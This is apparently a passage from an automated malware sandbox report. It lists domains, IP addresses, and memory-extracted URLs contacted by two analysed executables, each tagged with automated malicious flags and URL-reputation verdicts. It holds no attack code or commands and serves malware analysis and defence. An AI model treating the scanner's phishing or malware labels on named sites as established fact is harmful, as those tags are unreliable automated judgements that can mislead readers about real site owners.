                  http://www.alteor.cl//0%Avira URL Cloudsafe
                  http://www.myropcb.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.00%Avira URL Cloudsafe
                  http://www.abart.pl/.100%Avira URL Cloudphishing
                  http://ramkome.com/0%Avira URL Cloudsafe
                  http://uhsa.edu.ag/0%Avira URL Cloudsafe
                  http://www.nqks.com/m/o%0%Avira URL Cloudsafe
                  http://www.ka-mo-me.com/e0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  holp-ai.com
                  59.106.13.169
                  truefalse
                    high
                    impexnc.com
                    204.11.56.48
                    truefalse
                      high
                      webways.com
                      188.114.96.7
                      truefalse
                        high
                        www.fcwcvt.org
                        188.114.96.7
                        truefalse
                          high
                          dayvo.com
                          188.114.97.7
                          truefalse
                            high
                            hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
                            3.130.204.160
                            truefalse
                              high
                              enguita.net
                              195.5.116.23
                              truefalse
                                high
                                dataform.co.uk
                                83.223.113.46
                                truefalse
                                  high
                                  shteeble.com
                                  185.106.129.180
                                  truefalse
                                    high
                                    evcpa.com
                                    192.124.249.10
                                    truefalse
                                      high
                                      kallman.net
                                      185.76.64.25
                                      truefalse
                                        high
                                        shittas.com
                                        43.246.117.171
                                        truefalse
                                          high
                                          bible.org
                                          104.20.55.214
                                          truefalse
                                            high
                                            gphpedit.org
                                            127.0.0.1
                                            truefalse
                                              high
                                              missnue.com
                                              104.21.234.120
                                              truefalse
                                                high
                                                jsaps.com
                                                49.212.235.59
                                                truefalse
                                                  high
                                                  pohlfood.com
                                                  104.218.10.254
                                                  truefalse
                                                    high
                                                    notis.ru
                                                    185.178.208.141
                                                    truefalse
                                                      high
                                                      canasil.com
                                                      172.67.68.180
                                                      truefalse
                                                        high
                                                        www.jenco.co.uk
                                                        172.67.208.67
                                                        truefalse
                                                          high
                                                          www.tyrns.com
                                                          62.75.216.137
                                                          truefalse
                                                            high
                                                            nts-web.net
                                                            49.212.235.175
                                                            truefalse
                                                              high
                                                              willsub.com
                                                              69.89.107.122
                                                              truefalse
                                                                high
                                                                ldh.la.gov
                                                                75.2.95.235
                                                                truefalse
                                                                  high
                                                                  shesfit.com
                                                                  188.114.97.7
                                                                  truefalse
                                                                    high
                                                                    www.vexcom.com
                                                                    172.67.173.200
                                                                    truefalse
                                                                      high
                                                                      cpmteam.com
                                                                      188.114.97.7
                                                                      truefalse
                                                                        high
                                                                        tcpoa.com
                                                                        164.90.244.158
                                                                        truefalse
                                                                          high
                                                                          kevyt.net
                                                                          172.67.129.18
                                                                          truefalse
                                                                            high
                                                                            www.mobilnic.net
                                                                            154.203.14.100
                                                                            truefalse
                                                                              high
                                                                              s5w.com
                                                                              192.99.226.184
                                                                              truefalse
                                                                                high
                                                                                www.sclover3.com
                                                                                157.112.182.239
                                                                                truefalse
                                                                                  high
                                                                                  in1.smtp.messaginguser.com
                                                                                  103.168.172.216
                                                                                  truefalse
                                                                                    high
                                                                                    paraski.org
                                                                                    94.130.164.242
                                                                                    truefalse
                                                                                      high
                                                                                      dog-jog.net
                                                                                      153.122.24.177
                                                                                      truefalse
                                                                                        high
                                                                                        kamptal.at
                                                                                        128.204.134.138
                                                                                        truefalse
                                                                                          high
                                                                                          bd-style.com
                                                                                          103.112.69.92
                                                                                          truefalse
                                                                                            high
                                                                                            ora.ecnet.jp
                                                                                            60.43.154.138
                                                                                            truefalse
                                                                                              high
                                                                                              adventist.ro
                                                                                              49.12.155.123
                                                                                              truefalse
                                                                                                high
                                                                                                www.edimart.hu
                                                                                                81.2.194.241
                                                                                                truefalse
                                                                                                  high
                                                                                                  zupraha.cz
                                                                                                  77.78.104.3
                                                                                                  truefalse
                                                                                                    high
                                                                                                    isom.org
                                                                                                    192.124.249.14
                                                                                                    truefalse
                                                                                                      high
                                                                                                      any-s.net
                                                                                                      108.170.12.50
                                                                                                      truefalse
                                                                                                        high
                                                                                                        muhr-soehne.de
                                                                                                        5.189.171.125
                                                                                                        truefalse
                                                                                                          high
                                                                                                          www.railbook.net
                                                                                                          103.224.212.221
                                                                                                          truefalse
                                                                                                            high
                                                                                                            hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com
                                                                                                            54.161.222.85
                                                                                                            truefalse
                                                                                                              high
                                                                                                              oaith.ca
                                                                                                              192.124.249.12
                                                                                                              truefalse
                                                                                                                high
                                                                                                                shztm.ru
                                                                                                                62.122.170.171
                                                                                                                truefalse
                                                                                                                  high
                                                                                                                  akr.co.id
                                                                                                                  104.20.123.68
                                                                                                                  truefalse
                                                                                                                    high
                                                                                                                    www.abdg.com
                                                                                                                    192.252.154.18
                                                                                                                    truefalse
                                                                                                                      high
                                                                                                                      www.spanesi.com
                                                                                                                      5.196.166.214
                                                                                                                      truefalse
                                                                                                                        high
                                                                                                                        aiolos-sa.gr
                                                                                                                        188.114.96.7
                                                                                                                        truefalse
                                                                                                                          high
                                                                                                                          metaforacom.com
                                                                                                                          185.42.105.162
                                                                                                                          truefalse
                                                                                                                            high
                                                                                                                            dhh.la.gov
                                                                                                                            52.200.51.73
                                                                                                                            truefalse
                                                                                                                              high
                                                                                                                              gmail-smtp-in.l.google.com
                                                                                                                              108.177.126.27
                                                                                                                              truefalse
                                                                                                                                high
                                                                                                                                fdlymca.org
                                                                                                                                192.124.249.9
                                                                                                                                truefalse
                                                                                                                                  high
                                                                                                                                  smtp1.sbc.mail.am0.yahoodns.net
                                                                                                                                  67.195.12.38
                                                                                                                                  truefalse
                                                                                                                                    high
                                                                                                                                    assideum.com
                                                                                                                                    52.219.94.144
                                                                                                                                    truefalse
                                                                                                                                      high
                                                                                                                                      bidroll.com
                                                                                                                                      13.56.33.8
                                                                                                                                      truefalse
                                                                                                                                        high
                                                                                                                                        cbras.com
                                                                                                                                        54.39.198.18
                                                                                                                                        truefalse
                                                                                                                                          high
                                                                                                                                          atbauk.org
                                                                                                                                          104.21.92.170
                                                                                                                                          truefalse
                                                                                                                                            high
                                                                                                                                            www.naoi-a.com
                                                                                                                                            202.254.236.40
                                                                                                                                            truefalse
                                                                                                                                              high
                                                                                                                                              www.vazir.se
                                                                                                                                              206.191.152.37
                                                                                                                                              truefalse
                                                                                                                                                high
                                                                                                                                                d2r2uj0bnofxxz.cloudfront.net
                                                                                                                                                18.165.183.21
                                                                                                                                                truefalse
                                                                                                                                                  high
                                                                                                                                                  www.valselit.com
                                                                                                                                                  193.70.68.254
                                                                                                                                                  truefalse
                                                                                                                                                    high
                                                                                                                                                    vvsteknik.dk
                                                                                                                                                    185.31.76.90
                                                                                                                                                    truefalse
                                                                                                                                                      high
                                                                                                                                                      biosolve.com
                                                                                                                                                      151.101.130.159
                                                                                                                                                      truefalse
                                                                                                                                                        high
                                                                                                                                                        karmy.com.pl
                                                                                                                                                        185.253.212.22
                                                                                                                                                        truefalse
                                                                                                                                                          high
                                                                                                                                                          www.fe-bauer.de
                                                                                                                                                          3.65.101.129
                                                                                                                                                          truefalse
                                                                                                                                                            high
                                                                                                                                                            smtp.mail.global.gm0.yahoodns.net
                                                                                                                                                            87.248.97.36
                                                                                                                                                            truefalse
                                                                                                                                                              high
                                                                                                                                                              vdoherty.com
                                                                                                                                                              91.216.241.100
                                                                                                                                                              truefalse
                                                                                                                                                                high
                                                                                                                                                                hbfuels.com
                                                                                                                                                                85.233.160.146
                                                                                                                                                                truefalse
                                                                                                                                                                  high
                                                                                                                                                                  td-ccm-neg-87-45.wixdns.net
                                                                                                                                                                  34.149.87.45
                                                                                                                                                                  truefalse
                                                                                                                                                                    high
                                                                                                                                                                    pb-games.com
                                                                                                                                                                    173.254.28.29
                                                                                                                                                                    truefalse
                                                                                                                                                                      high
                                                                                                                                                                      mackusick.de
                                                                                                                                                                      217.160.0.131
                                                                                                                                                                      truefalse
                                                                                                                                                                        high
                                                                                                                                                                        ncn.de
                                                                                                                                                                        46.30.60.158
                                                                                                                                                                        truefalse
                                                                                                                                                                          high
                                                                                                                                                                          nekono.net
                                                                                                                                                                          202.172.28.187
                                                                                                                                                                          truefalse
                                                                                                                                                                            high
                                                                                                                                                                            fnw.us
                                                                                                                                                                            137.118.26.67
                                                                                                                                                                            truefalse
                                                                                                                                                                              high
                                                                                                                                                                              komie.com
                                                                                                                                                                              59.106.13.181
                                                                                                                                                                              truefalse
                                                                                                                                                                                high
                                                                                                                                                                                ftmobile.com
                                                                                                                                                                                199.34.228.78
                                                                                                                                                                                truefalse
                                                                                                                                                                                  high
                                                                                                                                                                                  www.x0c.com
                                                                                                                                                                                  185.53.177.50
                                                                                                                                                                                  truefalse
                                                                                                                                                                                    high
                                                                                                                                                                                    onzcda.com
                                                                                                                                                                                    35.186.238.101
                                                                                                                                                                                    truefalse
                                                                                                                                                                                      high
                                                                                                                                                                                      sledsport.ru
                                                                                                                                                                                      185.22.232.175
                                                                                                                                                                                      truefalse
                                                                                                                                                                                        high
                                                                                                                                                                                        www.findbc.com
                                                                                                                                                                                        13.248.169.48
                                                                                                                                                                                        truefalse
                                                                                                                                                                                          high
                                                                                                                                                                                          tbvlugus.nl
                                                                                                                                                                                          174.129.25.170
                                                                                                                                                                                          truefalse
                                                                                                                                                                                            high
                                                                                                                                                                                            infotech.pl
                                                                                                                                                                                            79.96.32.254
                                                                                                                                                                                            truefalse
                                                                                                                                                                                              high
                                                                                                                                                                                              pellys.co.uk
                                                                                                                                                                                              77.72.4.226
                                                                                                                                                                                              truefalse
                                                                                                                                                                                                high
                                                                                                                                                                                                cubodown.com
                                                                                                                                                                                                172.67.150.50
                                                                                                                                                                                                truefalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  semuk.com
                                                                                                                                                                                                  86.105.245.69
                                                                                                                                                                                                  truefalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    tozzhin.com
                                                                                                                                                                                                    202.94.166.30
                                                                                                                                                                                                    truefalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      cqdgroup.com
                                                                                                                                                                                                      221.132.33.88
                                                                                                                                                                                                      truefalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        tabbles.net
                                                                                                                                                                                                        80.211.41.39
                                                                                                                                                                                                        truefalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          www.muhr-soehne.de
                                                                                                                                                                                                          5.189.171.125
                                                                                                                                                                                                          truefalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            fortknox.bm
                                                                                                                                                                                                            216.177.137.32
                                                                                                                                                                                                            truefalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              camamat.com
                                                                                                                                                                                                              104.21.235.32
                                                                                                                                                                                                              truefalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                mail.airmail.net
                                                                                                                                                                                                                66.226.70.66
                                                                                                                                                                                                                truefalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  lyto.net
                                                                                                                                                                                                                  188.114.97.7
                                                                                                                                                                                                                  truefalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    ikulani.com
                                                                                                                                                                                                                    157.7.107.88
                                                                                                                                                                                                                    truefalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      alexpope.biz
                                                                                                                                                                                                                      76.74.184.61
                                                                                                                                                                                                                      truefalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        cjborden.com
                                                                                                                                                                                                                        15.197.142.173
                                                                                                                                                                                                                        truefalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                          http://dog-jog.net/true
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://univi.it/true
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://likangds.com/true
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://www.elpro.si/false
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://www.credo.edu.pl/false
                                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://sigtoa.com/true
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://dhh.la.gov/false
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            http://www.naoi-a.com/false
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            http://www.abdg.com/false
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            http://msl-lock.com/false
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://ldh.la.gov/false
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                http://calvinly.com/false
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://ruzee.com/true
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://www.ora-ito.com/false
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://vvsteknik.dk/true
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://shanks.co.uk/true
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://arowines.com/true
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://dataform.co.uk/wp-signup.php?new=magicomm.co.uktrue
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://oozkranj.com/true
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://ramkome.com/true
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://uhsa.edu.ag/true
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                https://www.com-sit.com/usa/nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  http://www.com-sit.com/wp-content/uploads/elementor/css/post-1395.css?ver=1685626300nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wcnhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://pohlfood.com/#websitepigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • 1%, Virustotal, Browse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://www.pcgrate.com/#webpagepigalicapi.exe, 00000001.00000003.740633377.00000000050B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • 0%, Virustotal, Browse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://inhouse.pohlfood.com/pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.50nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.jsnhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://gpthink.com/product/204.htmlnhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://pohlfood.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.14.1nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://www.stajum.com/MnhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    http://www.com-sit.com/wp-content/uploads/premium-addons-elementor/pa-frontend-2947ecb72.min.css?vernhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      http://www.valselit.com/174-appartement-a-vendre-grenoble-30514pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                                                                      unknown
